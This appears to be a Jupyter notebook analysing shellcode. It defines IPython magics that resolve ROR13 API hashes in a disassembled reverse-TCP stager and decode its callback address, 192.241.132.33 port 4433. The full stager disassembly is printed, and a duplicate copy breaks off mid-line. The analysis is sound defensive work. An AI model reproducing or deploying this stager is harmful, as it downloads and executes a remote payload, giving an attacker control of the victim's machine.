In [9]:
import re
import os
import tempfile
import sqlite3

from IPython.core.magic import (register_line_magic, register_cell_magic,
                                register_line_cell_magic)

APIDict = {}
fDbLoaded = False

def prepareAPIs():
    global APIDict
    global fDbLoaded
    szDbPath = None

    if szDbPath is None:
        szDbPath = os.path.join(tempfile.gettempdir(),'apihashes.db')
        if not os.path.isfile(szDbPath):
            url = 'https://github.com/JohnLaTwC/PyPowerShellXray/blob/master/apihashes.db?raw=true'
            import urllib.request
            urllib.request.urlretrieve(url, szDbPath)

    ## if APIs are being loaded from a DB, then do that now
    if (szDbPath is not None and not fDbLoaded):
        db = sqlite3.connect(szDbPath)
        cursor = db.cursor()
        cursor.execute('''SELECT module, api, hashvalue FROM APIs''')
        all_rows = cursor.fetchall()
        for row in all_rows:
            szHash = row[2]
            szDll = row[0]
            szAPI = row[1]
            APIDict[szHash] =  szDll + "!" + szAPI
        db.close()
        fDbLoaded = True
        
@register_cell_magic
def blockhash(line, cell=None):
    if not fDbLoaded:
        prepareAPIs()
    modsz = cell
    for dw in re.findall('PUSH ([A-Fa-f0-9]{8})', cell):
        try:
            modsz = re.sub('PUSH '+ dw, APIDict['0x' + dw.lower()], modsz)
        except KeyError:
            pass
    print(modsz)
del blockhash

@register_line_magic
def port(line, cell=None):
    match = re.search('PUSH ([A-Fa-f0-9]{4})[A-Fa-f0-9]{4}', line)
    hexPort = int(match.group(1), 16)  
    hexPort = ((hexPort & 0x0000FF00) >> 8)  + ((hexPort & 0x000000FF) << 8)
    return hexPort

del port

@register_line_magic
def ip(line, cell=None):
    match = re.search('PUSH ([A-Fa-f0-9]{8})', line)
    hexIP = int(match.group(1), 16)  
    return "%s.%s.%s.%s\n" % (hexIP & 0x000000FF, (hexIP & 0x0000FF00) >> 8, (hexIP & 0x00FF0000)>>16, (hexIP & 0xFF000000) >> 24 )

del ip

In [10]:
%%blockhash
00000000 FC                              CLD
00000001 E882000000                      CALL -FFFFFF78
00000006 60                              PUSHA
00000007 89E5                            MOV EBP,ESP
00000009 31C0                            XOR EAX,EAX
0000000B 648B5030                        MOV EDX,DWORD PTR FS:[EAX+30]
0000000F 8B520C                          MOV EDX,DWORD PTR [EDX+0C]
00000012 8B5214                          MOV EDX,DWORD PTR [EDX+14]
00000015 8B7228                          MOV ESI,DWORD PTR [EDX+28]
00000018 0FB74A26                        MOVZX ECX,WORD PTR [EDX+26]
0000001C 31FF                            XOR EDI,EDI
0000001E AC                              LODS AL,BYTE PTR [ESI]
0000001F 3C61                            CMP AL,61
00000021 7C02                            JL 00000025
00000023 2C20                            SUB AL,20
00000025 C1CF0D                          ROR EDI,0D
00000028 01C7                            ADD EDI,EAX
0000002A E2F2                            LOOP 0000001E
0000002C 52                              PUSH EDX
0000002D 57                              PUSH EDI
0000002E 8B5210                          MOV EDX,DWORD PTR [EDX+10]
00000031 8B4A3C                          MOV ECX,DWORD PTR [EDX+3C]
00000034 8B4C1178                        MOV ECX,DWORD PTR [ECX+EDX+78]
00000038 E348                            JRCXZ 00000082
0000003A 01D1                            ADD ECX,EDX
0000003C 51                              PUSH ECX
0000003D 8B5920                          MOV EBX,DWORD PTR [ECX+20]
00000040 01D3                            ADD EBX,EDX
00000042 8B4918                          MOV ECX,DWORD PTR [ECX+18]
00000045 E33A                            JRCXZ 00000081
00000047 49                              DEC ECX
00000048 8B348B                          MOV ESI,DWORD PTR [EBX+ECX*4]
0000004B 01D6                            ADD ESI,EDX
0000004D 31FF                            XOR EDI,EDI
0000004F AC                              LODS AL,BYTE PTR [ESI]
00000050 C1CF0D                          ROR EDI,0D
00000053 01C7                            ADD EDI,EAX
00000055 38E0                            CMP AL,AH
00000057 75F6                            JNE 0000004F
00000059 037DF8                          ADD EDI,DWORD PTR [EBP-08]
0000005C 3B7D24                          CMP EDI,DWORD PTR [EBP+24]
0000005F 75E4                            JNE 00000045
00000061 58                              POP EAX
00000062 8B5824                          MOV EBX,DWORD PTR [EAX+24]
00000065 01D3                            ADD EBX,EDX
00000067 668B0C4B                        MOV CX,WORD PTR [EBX+ECX*2]
0000006B 8B581C                          MOV EBX,DWORD PTR [EAX+1C]
0000006E 01D3                            ADD EBX,EDX
00000070 8B048B                          MOV EAX,DWORD PTR [EBX+ECX*4]
00000073 01D0                            ADD EAX,EDX
00000075 89442424                        MOV DWORD PTR [ESP+24],EAX
00000079 5B                              POP EBX
0000007A 5B                              POP EBX
0000007B 61                              POPA
0000007C 59                              POP ECX
0000007D 5A                              POP EDX
0000007E 51                              PUSH ECX
0000007F FFE0                            JMP EAX
00000081 5F                              POP EDI
00000082 5F                              POP EDI
00000083 5A                              POP EDX
00000084 8B12                            MOV EDX,DWORD PTR [EDX]
00000086 EB8D                            JMP 00000015
00000088 5D                              POP EBP
00000089 6833320000                      PUSH 00003233
0000008E 687773325F                      PUSH 5F327377
00000093 54                              PUSH ESP
00000094 684C772607                      PUSH 0726774C
00000099 89E8                            MOV EAX,EBP
0000009B FFD0                            CALL EAX
0000009D B890010000                      MOV EAX,00000190
000000A2 29C4                            SUB ESP,EAX
000000A4 54                              PUSH ESP
000000A5 50                              PUSH EAX
000000A6 6829806B00                      PUSH 006B8029
000000AB FFD5                            CALL EBP
000000AD 6A0A                            PUSH 0000000A
000000AF 68C0F18421                      PUSH 2184F1C0
000000B4 6802001151                      PUSH 51110002
000000B9 89E6                            MOV ESI,ESP
000000BB 50                              PUSH EAX
000000BC 50                              PUSH EAX
000000BD 50                              PUSH EAX
000000BE 50                              PUSH EAX
000000BF 40                              INC EAX
000000C0 50                              PUSH EAX
000000C1 40                              INC EAX
000000C2 50                              PUSH EAX
000000C3 68EA0FDFE0                      PUSH E0DF0FEA
000000C8 FFD5                            CALL EBP
000000CA 97                              XCHG EAX,EDI
000000CB 6A10                            PUSH 00000010
000000CD 56                              PUSH ESI
000000CE 57                              PUSH EDI
000000CF 6899A57461                      PUSH 6174A599
000000D4 FFD5                            CALL EBP
000000D6 85C0                            TEST EAX,EAX
000000D8 740A                            JE 000000E4
000000DA FF4E08                          DEC DWORD PTR [ESI+08]
000000DD 75EC                            JNE 000000CB
000000DF E867000000                      CALL -FFFFFEB5
000000E4 6A00                            PUSH 00000000
000000E6 6A04                            PUSH 00000004
000000E8 56                              PUSH ESI
000000E9 57                              PUSH EDI
000000EA 6802D9C85F                      PUSH 5FC8D902
000000EF FFD5                            CALL EBP
000000F1 83F800                          CMP EAX,00000000
000000F4 7E36                            JLE 0000012C
000000F6 8B36                            MOV ESI,DWORD PTR [ESI]
000000F8 6A40                            PUSH 00000040
000000FA 6800100000                      PUSH 00001000
000000FF 56                              PUSH ESI
00000100 6A00                            PUSH 00000000
00000102 6858A453E5                      PUSH E553A458
00000107 FFD5                            CALL EBP
00000109 93                              XCHG EAX,EBX
0000010A 53                              PUSH EBX
0000010B 6A00                            PUSH 00000000
0000010D 56                              PUSH ESI
0000010E 53                              PUSH EBX
0000010F 57                              PUSH EDI
00000110 6802D9C85F                      PUSH 5FC8D902
00000115 FFD5                            CALL EBP
00000117 83F800                          CMP EAX,00000000
0000011A 7D28                            JGE 00000144
0000011C 58                              POP EAX
0000011D 6800400000                      PUSH 00004000
00000122 6A00                            PUSH 00000000
00000124 50                              PUSH EAX
00000125 680B2F0F30                      PUSH 300F2F0B
0000012A FFD5                            CALL EBP
0000012C 57                              PUSH EDI
0000012D 68756E4D61                      PUSH 614D6E75
00000132 FFD5                            CALL EBP
00000134 5E                              POP ESI
00000135 5E                              POP ESI
00000136 FF0C24                          DEC DWORD PTR [ESP]
00000139 0F8570FFFFFF                    JNE 000000AF
0000013F E99BFFFFFF                      JMP 000000DF
00000144 01C3                            ADD EBX,EAX
00000146 29C6                            SUB ESI,EAX
00000148 75C1                            JNE 0000010B
0000014A C3                              RET
0000014B BBF0B5A256                      MOV EBX,56A2B5F0
00000150 6A00                            PUSH 00000000
00000152 53                              PUSH EBX
00000153 FFD5                            CALL EBP


00000000 FC                              CLD
00000001 E882000000                      CALL -FFFFFF78
00000006 60                              PUSHA
00000007 89E5                            MOV EBP,ESP
00000009 31C0                            XOR EAX,EAX
0000000B 648B5030                        MOV EDX,DWORD PTR FS:[EAX+30]
0000000F 8B520C                          MOV EDX,DWORD PTR [EDX+0C]
00000012 8B5214                          MOV EDX,DWORD PTR [EDX+14]
00000015 8B7228                          MOV ESI,DWORD PTR [EDX+28]
00000018 0FB74A26                        MOVZX ECX,WORD PTR [EDX+26]
0000001C 31FF                            XOR EDI,EDI
0000001E AC                              LODS AL,BYTE PTR [ESI]
0000001F 3C61                            CMP AL,61
00000021 7C02                            JL 00000025
00000023 2C20                            SUB AL,20
00000025 C1CF0D                          ROR EDI,0D
00000028 01C7                            ADD EDI,EAX
0000002A E2F2            

In [11]:
%ip PUSH 2184F1C0

'192.241.132.33\n'

In [12]:
%port PUSH 51110002

4433